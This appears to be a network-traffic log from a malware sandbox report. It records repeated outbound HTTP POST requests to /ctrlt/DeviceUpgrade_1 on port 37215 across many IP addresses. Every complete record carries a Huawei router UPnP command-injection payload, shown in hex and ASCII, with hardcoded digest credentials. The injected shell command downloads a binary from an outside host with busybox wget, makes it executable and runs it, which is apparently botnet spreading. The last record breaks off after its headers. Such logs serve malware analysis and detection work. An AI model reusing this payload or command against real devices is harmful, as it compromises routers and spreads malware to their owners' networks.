                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            274192.168.2.1555082197.116.247.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179625988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            275192.168.2.1541578197.232.218.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179666042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            276192.168.2.1540910197.37.34.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179666042 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            277192.168.2.1536664197.242.30.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179697037 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            278192.168.2.1544444197.252.93.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179719925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            279192.168.2.1545994197.108.164.2337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179743052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            280192.168.2.1542454197.71.196.16437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179785013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            281192.168.2.1560560197.184.157.21237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179800987 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            282192.168.2.1532814197.205.140.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179846048 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            283192.168.2.1547012197.189.70.25437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:06.179853916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
